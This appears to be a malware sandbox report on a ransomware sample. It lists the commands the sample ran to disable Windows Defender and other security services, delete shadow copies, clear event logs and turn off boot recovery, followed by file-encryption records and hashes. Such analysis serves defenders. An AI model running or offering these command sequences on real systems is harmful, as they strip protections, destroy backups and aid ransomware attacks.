C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\ihr6_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

memory/644-54-0x0000000000000000-mapping.dmp

memory/1624-55-0x0000000000000000-mapping.dmp

memory/1500-56-0x0000000000000000-mapping.dmp

memory/532-57-0x0000000000000000-mapping.dmp

memory/1976-58-0x0000000000000000-mapping.dmp

memory/1752-59-0x0000000000000000-mapping.dmp

memory/620-60-0x0000000000000000-mapping.dmp

memory/1984-61-0x0000000000000000-mapping.dmp

memory/2036-62-0x0000000000000000-mapping.dmp

memory/1056-63-0x0000000000000000-mapping.dmp

memory/1088-64-0x0000000000000000-mapping.dmp

memory/852-65-0x0000000000000000-mapping.dmp

memory/820-66-0x0000000000000000-mapping.dmp

memory/1236-67-0x0000000000000000-mapping.dmp

memory/1464-68-0x0000000000000000-mapping.dmp

memory/792-69-0x0000000000000000-mapping.dmp

memory/1648-70-0x0000000000000000-mapping.dmp

memory/652-71-0x0000000000000000-mapping.dmp

memory/844-72-0x0000000000000000-mapping.dmp

memory/1272-73-0x0000000000000000-mapping.dmp

memory/1204-74-0x0000000000000000-mapping.dmp

memory/684-75-0x0000000000000000-mapping.dmp

memory/1628-76-0x0000000000000000-mapping.dmp

memory/1508-77-0x0000000000000000-mapping.dmp

memory/1680-78-0x0000000000000000-mapping.dmp

memory/616-79-0x0000000000000000-mapping.dmp

memory/1112-80-0x0000000000000000-mapping.dmp

memory/1716-81-0x0000000000000000-mapping.dmp

memory/384-82-0x0000000000000000-mapping.dmp

memory/1984-83-0x0000000000000000-mapping.dmp

memory/1052-84-0x0000000000000000-mapping.dmp

memory/1924-85-0x0000000000000000-mapping.dmp

memory/2000-86-0x0000000000000000-mapping.dmp

memory/744-87-0x0000000000000000-mapping.dmp

memory/1872-88-0x0000000000000000-mapping.dmp

memory/320-89-0x0000000000000000-mapping.dmp

memory/856-90-0x0000000000000000-mapping.dmp

memory/1712-91-0x0000000000000000-mapping.dmp

memory/1096-92-0x0000000000000000-mapping.dmp

memory/1548-93-0x0000000000000000-mapping.dmp

memory/1316-94-0x0000000000000000-mapping.dmp

memory/328-95-0x0000000000000000-mapping.dmp

memory/1832-96-0x0000000000000000-mapping.dmp

memory/1824-97-0x0000000000000000-mapping.dmp

memory/1160-98-0x0000000000000000-mapping.dmp

memory/1748-99-0x0000000000000000-mapping.dmp

memory/1236-100-0x0000000000000000-mapping.dmp

memory/1596-101-0x0000000000000000-mapping.dmp

memory/1652-102-0x0000000000000000-mapping.dmp

memory/1940-103-0x0000000000000000-mapping.dmp

memory/1740-104-0x0000000000000000-mapping.dmp

memory/1588-105-0x0000000000000000-mapping.dmp

memory/1624-106-0x0000000000000000-mapping.dmp

memory/1820-107-0x0000000000000000-mapping.dmp

memory/1492-108-0x0000000000000000-mapping.dmp

memory/896-109-0x0000000000000000-mapping.dmp

memory/1328-110-0x0000000000000000-mapping.dmp

memory/736-111-0x0000000000000000-mapping.dmp

memory/1600-112-0x0000000000000000-mapping.dmp

memory/1600-113-0x000007FEFB551000-0x000007FEFB553000-memory.dmp

memory/1732-114-0x0000000000000000-mapping.dmp

memory/2028-116-0x0000000000000000-mapping.dmp

memory/1604-118-0x0000000000000000-mapping.dmp

memory/1720-119-0x0000000000000000-mapping.dmp

memory/1384-120-0x0000000000000000-mapping.dmp

memory/852-122-0x000007FEF2040000-0x000007FEF2B9D000-memory.dmp

memory/852-124-0x0000000002300000-0x0000000002302000-memory.dmp

memory/852-125-0x0000000002302000-0x0000000002304000-memory.dmp

memory/852-126-0x0000000002304000-0x0000000002307000-memory.dmp

memory/852-123-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

memory/852-127-0x000000000230B000-0x000000000232A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2aa9f499df2f8b28486532cd948eb75b
SHA1 64579980334326fa5e99cb49e22a46ac86a8fa6b
SHA256 7ff364a4895a250e935f2eba287e205406915ec6e5d944d1eb30edfc8118f00c
SHA512 4f5b6e1bf43d84c82c39df37c320b10a79d147fc8ce6ab1e237b4f363f49053a2d64943dd6f77946233bbb9ef474d77952d2f81279a9c58212539722cce2191b

memory/2140-130-0x000007FEF2580000-0x000007FEF30DD000-memory.dmp

memory/2140-131-0x00000000023B0000-0x00000000023B2000-memory.dmp

memory/2140-132-0x00000000023B2000-0x00000000023B4000-memory.dmp

memory/2140-133-0x00000000023B4000-0x00000000023B7000-memory.dmp

memory/2140-134-0x00000000023BB000-0x00000000023DA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-23 08:33

Reported

2022-03-23 08:40

Platform

win10v2004-en-20220113

Max time kernel

131s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_NgAAADYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTest-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageStoreLogo.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_JgAAACYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.INF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10O.CHM.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pt_BR.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_OAAAADgAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-windows.xml.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_CgAAAAoAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\doh-rollout@mozilla.org.xpi.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\mscss7cm_en.dub.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\Sybase.xsl.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_EAAAABAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\javafx.properties.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_FgAAABYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_JgAAACYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_KgAAACoAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-100.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_FgAAABYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\PREVIEW.GIF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClientIsv.man.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_BAAAAAQAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_PgAAAD4AAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_GAAAABgAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-72_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Grace-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.tree.dat.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedMedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\nl-NL\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_MAK_AE-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AgAAAAIAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\10px.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedStoreLogo.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALNBI.TTF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
